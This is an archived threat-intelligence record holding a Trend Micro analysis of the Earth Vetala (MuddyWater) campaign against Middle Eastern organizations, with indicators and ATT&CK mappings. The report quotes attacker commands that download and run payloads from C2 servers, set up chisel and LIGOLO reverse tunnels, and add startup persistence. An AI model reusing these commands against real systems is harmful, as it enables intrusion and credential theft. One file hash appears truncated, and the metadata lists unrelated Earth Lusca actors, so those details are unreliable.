{
	"id": "b38469ef-a6f5-40bc-995b-fb0642bad99e",
	"created_at": "2026-04-06T00:11:25.177071Z",
	"updated_at": "2026-04-10T03:36:48.055511Z",
	"deleted_at": null,
	"sha1_hash": "3fb6629ff0e1e8632833f77c9f2078e121e1fff8",
	"title": "Earth Vetala MuddyWater Continues to Target Organizations in the Middle East",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 903861,
	"plain_text": "Earth Vetala MuddyWater Continues to Target Organizations in the\r\nMiddle East\r\nBy: Adi Peretz, Erick Thek Mar 05, 2021 Read time: 7 min (1860 words)\r\nPublished: 2021-03-05 · Archived: 2026-04-02 12:35:20 UTC\r\nTrend Micro researchers recently detected activity targeting various organizations in the Middle East and neighboring\r\nregions. We were tipped off to this activity in part by research from Anomali, which also identified a campaign targeting\r\nsimilar victims. We believe (with moderate confidence) that this newly identified activity is connected to MuddyWater (also\r\nknown as TEMP.Zagros, Static Kitten, Seedworm).\r\nAdditionally, we were able to link the Anomali-identified activity to an ongoing campaign in 2021. This campaign uses\r\nlegitimate remote admin tools such as:\r\nScreenConnect\r\nRemoteUtilities\r\nWe have named this intrusion set Earth Vetala. Earth Vetala used spearphishing emails with embedded links to a legitimate\r\nfile-sharing service to distribute their malicious package. The links were embedded within lure documents as well as emails.\r\nOnce a victim was accessed, attackers would determine if the user account was an administrator or a normal user. They would\r\nthen download post-exploitation tools that included password/process-dumping utilities, reverse-tunneling tools, and custom\r\nbackdoors. The threat actors would then initiate communications with additional command-and-control (C\u0026C) infrastructure\r\nto execute obfuscated PowerShell scripts.\r\nOverview\r\nAnalysis indicates the Earth Vetala campaign is ongoing and that this threat actor has interests which appear to align with\r\nIran.\r\nEarth Vetala historically targets countries in the Middle East. In this campaign, Earth Vetala threat actors used spearphishing\r\nemails and lure documents against organizations within the United Arab Emirates, Saudi Arabia, Israel, and Azerbaijan. 
The\r\nphishing emails and lure documents contain embedded URLs linking to a legitimate file-sharing service to distribute\r\narchives containing the ScreenConnect remote administration tool. ScreenConnect is a legitimate application that allows\r\nsystems administrators to manage their enterprise systems remotely.\r\nOur research found threat indicators that were connected to the same campaign identified by Anomali. Analysis indicates\r\nthat Earth Vetala is still ongoing as of the publication of this post. During this campaign, threat actors used post-exploitation\r\ntools to dump passwords, tunnel their C\u0026C communication using open-source tools, and use additional C\u0026C infrastructure\r\nto establish a persistent presence within targeted hosts and environments.\r\nTechnical Analysis\r\nDuring our research, we observed a spearphishing email allegedly from a government agency.\r\nFigure 1. Phishing Email with the embedded URL\r\nThe email attempts to convince recipients to click the URL and download a malicious file. We have seen that one of two\r\nfiles may be downloaded, one being a .PDF file and the other an .RTF file.\r\nhttps://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html\r\nPage 1 of 8\n\nAs with the spearphishing email, the lure documents' content attempts to convince the victim to click on another malicious\r\nURL and download a .ZIP file.\r\nThe .ZIP file contains a copy of legitimate remote administration software developed by RemoteUtilities, which provides\r\nremote administration capabilities, including:\r\nDownloading and uploading files\r\nGrabbing screenshots\r\nBrowsing files and directories\r\nExecuting and terminating processes\r\nDuring our research, we were able to discover multiple .ZIP files used to distribute the RemoteUtilities remote\r\nadministration software in the manner above, with all of these distributing the same RemoteUtilities sample. 
The use of this\r\ntool differentiates this particular campaign from earlier research, as in previous attacks ScreenConnect was used. Otherwise,\r\nthe TTPs in use remain broadly similar.\r\nRemoteUtilities Analysis\r\nWhen the RemoteUtilities software is executed, its process launches msiexec.exe with the following command:\r\nFigure 2. RemoteUtilities Installation\r\nThe MSI installer installs a service on the victim machine called Remote Utilities – Host:\r\nFigure 3. Remote Utilities Service\r\nThe service then communicates with the domain id.remoteutilities.com, which belongs to RemoteUtilities. This connection\r\nis related to one of its features called Internet-ID Connection. This feature allows an intermediary Internet server to broker\r\nthe connection, similar to a proxy server. This allows the threat actor to connect to the Internet-ID server, which then\r\nconnects to the actual RemoteUtilities host.\r\nFigure 4. id-server connection\r\nPost-Exploitation Analysis\r\nDuring our research, we discovered a compromised host in Saudi Arabia that used ScreenConnect remote administration\r\nsoftware. They were targeted via a malicious .ZIP file (SHA256 hash:\r\nb2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf) that contained a ScreenConnect executable\r\n(SHA256 hash: 2f429efdb1801892ec8a2bcdd00a44d6ee31df04721482a1927fc6df554cdcf).\r\nAs noted above, the ScreenConnect executable connects to the Internet-ID server, which is located at instance-sy9at2-relay.screenconnect.com and resolves to 51.68.244.39.\r\nThe same domain was mentioned in the previous research. 
We then observed the threat actors interact with the compromised\r\nhost using the ScreenConnect software, executing the following commands:\r\ncmd.exe net user /domain\r\nThe command above lists all user accounts from the domain controller.\r\nThe next command executed is the following:\r\npowershell.exe -exec bypass -w 1 -file a.ps1\r\nThis is a command to execute a PowerShell script of some kind. However, we did not have access to the a.ps1 file, so we are\r\nnot sure what functionality is provided here.\r\nThe next command issued is the following:\r\npowershell.exe iwr -uri http://87.236.212[.]184/SharpChisel.exe -outfile c:\\programdata\\SharpChisel.exe -usebasicparsing\r\nThe command connects to 87.236.212[.]184 and downloads a file called SharpChisel.exe (SHA256:\r\n61f83466b512eb12fc82441259a5205f076254546a7726a2e3e983011898e4e2) and saves the file to the C:\\programdata\r\ndirectory. The name SharpChisel may be related to the purpose of this file, which is a C# wrapper for a tunneling tool called\r\nchisel. 
The above IP address is geolocated to a server in Iran.\r\nThe following command then configures SharpChisel:\r\nC:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999\r\nThis directs all traffic to the localhost at port 9999 to the same remote server.\r\nAnother instance of SharpChisel with different settings is executed, this time launched through PowerShell with the following\r\ncommand line:\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999\r\nThis time, traffic will be forwarded to the server over port 443.\r\nA third SharpChisel instance that connects to a different C\u0026C server at 23.95.215.100:8080 is started via the following\r\ncommand:\r\nC:\\programdata\\SharpChisel.exe client 23.95.215[.]100:8080 r:8888:127.0.0.1:9999\r\nIt is then configured with the following PowerShell command:\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 23.95.215[.]100:8080 R:8888:127.0.0.1:9999\r\nWe believe that the threat actor was unable to configure SharpChisel to work correctly. The use of the following command\r\nprovides additional evidence to support our assumption:\r\npowershell.exe iwr -uri hxxp://87.236.212[.]184/procdump64.exe -outfile c:\\programdata\\procdump64.exe -usebasicparsing\r\nThe command connects to the C\u0026C server, downloads procdump64.exe, and saves the file in the C:\\programdata directory.\r\nThat supports our assumption that SharpChisel could not be configured correctly, and the attacker instead used PowerShell\r\nto download and run the legitimate procdump64.exe utility.\r\nFigure 5. 
LIGOLO execution example\r\nThe threat actor then ran LIGOLO, a second tunneling tool, using two separate commands:\r\nC:\\programdate\\1.exe -relayserver 87.236.212[.]184:5555\r\nC:\\users\\public\\new.exe -relayserver 87.236.212[.]184:5555\r\nWe then see the threat actor again attempting to use SharpChisel several times using the following commands:\r\nC:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 r:8888:127.0.0.1:9999\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 87.236.212[.]184:8080 R:8888:127.0.0.1:9999\r\nWe conclude that a tunneling connection to the C\u0026C server could not be established, even after attempts to do so with two\r\ndifferent tools.\r\nFollowing the unsuccessful attempt to configure a tunnel connection to their C\u0026C server, the threat actors downloaded a\r\nremote access tool (RAT) and attempted to configure it. The following PowerShell command was used for this:\r\npowershell.exe iwr -uri hxxp://87.236.212[.]184/out1 -outfile c:\\users\\public\\out1.exe -usebasicparsing\r\nThe command downloads out1.exe and saves the file in the C:\\users\\public\\ directory. Using a UPX unpacker, we were able\r\nto extract the contents, which consist of a Python executable. We then used pyinstxtractor.py to extract the Python bytecode\r\nfiles from it, and decompiled those back to the original Python code using easypythondecompiler.\r\nThe out1.exe RAT has the following capabilities:\r\nData encoding\r\nEmail parsing\r\nFile and registry copy\r\nHTTP/S connection support\r\nNative command line\r\nProcess and file execution\r\nAfter this, the file C:\\users\\public\\Browser64.exe is run. Browser64 is a tool that extracts credentials from the following\r\napplications:\r\nChrome\r\nChromium\r\nFirefox\r\nOpera\r\nInternet Explorer\r\nOutlook\r\nFigure 6. 
Usage Example of Browser64.exe\r\nFollowing the use of browser64.exe, we observed the following command being executed:\r\npowershell.exe iex(new-object System.Net.WebClient).DownloadString('hxxp://23.94.50[.]197:444/index.jsp/deb2b1a127c472229babbb8dc2dca1c2/QPKb49mivezAdai1')\r\nThey again attempted to use SharpChisel with no success:\r\npowershell.exe C:\\programdata\\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999\r\nC:\\programdata\\SharpChisel.exe client 23.95.215[.]100:443 R:8888:127.0.0.1:9999\r\nC:\\programdata\\SharpChisel.exe server -p 9999 --socks5\r\nFinally, we observed a persistence mechanism being set using the following commands:\r\ncmd.exe /c Wscript.exe \"C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\news.js\"\r\ncmd.exe /c \"C:\\Users\\[REDACTED]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\newsblog.js\"\r\nWe were able to get a copy of newsblog.js, which is a simple VBS downloader that communicates with the following URL:\r\nhxxp://23[.]95[.]215[.]100:8008/index.jsp/7e95a3d753cc4a17793ef9513e030b49/4t2Fg7k6wWRnKgd9\r\nFigure 7. newsblog.js\r\nThe script sets up a new HTTP object and then tries to disable the system's local proxy settings. The script then executes an\r\nHTTP GET request to the C\u0026C URL, grabs the server's response, and sleeps for 10 seconds.\r\nAt the time of our analysis, this server was still available. The response from the server contains an encoded PowerShell\r\nscript, which is executed in memory. Decoding this script reveals that it contains a backdoor:\r\nFigure 8. deobfuscated PowerShell backdoor\r\nThe screenshot above shows an abbreviated view of the in-memory PowerShell backdoor. 
The PowerShell backdoor has the\r\nfollowing capabilities:\r\nCheck for Skype connectivity\r\nDownload and install Skype\r\nEncoded communication with its C2\r\nExecute commands sent from the C2 server\r\nGet multifactor authentication settings\r\nGet the currently logged on user and OS version\r\nEarth Vetala Footprint\r\nEarth Vetala conducted an extensive offensive campaign targeting multiple countries. We observed it operating in the\r\nfollowing countries:\r\nAzerbaijan\r\nBahrain\r\nIsrael\r\nSaudi Arabia\r\nUnited Arab Emirates\r\nFigure 9. Affected countries\r\nWe observed Earth Vetala target the following sectors:\r\nGovernment Agencies\r\nAcademia\r\nTourism\r\nTrend Micro Solutions\r\nEarth Vetala represents an interesting threat. While it possesses remote access capabilities, the attackers seem to lack the\r\nexpertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater\r\nthreat actors — and in other connected campaigns, the attackers have shown higher levels of technical skill.\r\nOur findings in this area were made possible by our Dedicated Intelligence Research (DIR) analysts. They are on-hand to\r\nhelp organizations reach important decisions and understand the nature of the security challenges they face. 
For more\r\ninformation on the Dedicated Intelligence Research service, please contact your regional Sales team.\r\nMITRE ATT\u0026CK Techniques Mapping\r\nTactic: Technique – ID\r\nResource Development: Acquire Infrastructure: Web Services – T1583.006\r\nInitial Access: Phishing: Spearphishing Attachment – T1566.001\r\nInitial Access: Phishing: Spearphishing Link – T1566.002\r\nExecution: Command and Scripting Interpreter: PowerShell – T1059.001\r\nExecution: Command and Scripting Interpreter: Windows Command Shell – T1059.003\r\nExecution: Command and Scripting Interpreter: Visual Basic – T1059.005\r\nExecution: User Execution: Malicious Link – T1204.001\r\nExecution: User Execution: Malicious File – T1204.002\r\nPersistence, Privilege Escalation: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – T1547.001\r\nDiscovery: Account Discovery: Domain Account – T1087.002\r\nCredential Access: Credentials from Password Stores: Credentials from Web Browsers – T1555.003\r\nCommand and Control: Data Encoding: Standard Encoding – T1132.001\r\nDefense Evasion: Deobfuscate/Decode Files or Information – T1140\r\nIndicators of Compromise\r\nNetwork\r\n23.94.50.197:444\r\n23.95.215.100:443\r\n23.95.215.100:8080\r\n87.236.212.184:443\r\n87.236.212.184:8008\r\nSource: https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html"
	],
	"report_names": [
		"earth-vetala---muddywater-continues-to-target-organizations-in-t.html"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434285,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3fb6629ff0e1e8632833f77c9f2078e121e1fff8.pdf",
		"text": "https://archive.orkl.eu/3fb6629ff0e1e8632833f77c9f2078e121e1fff8.txt",
		"img": "https://archive.orkl.eu/3fb6629ff0e1e8632833f77c9f2078e121e1fff8.jpg"
	}
}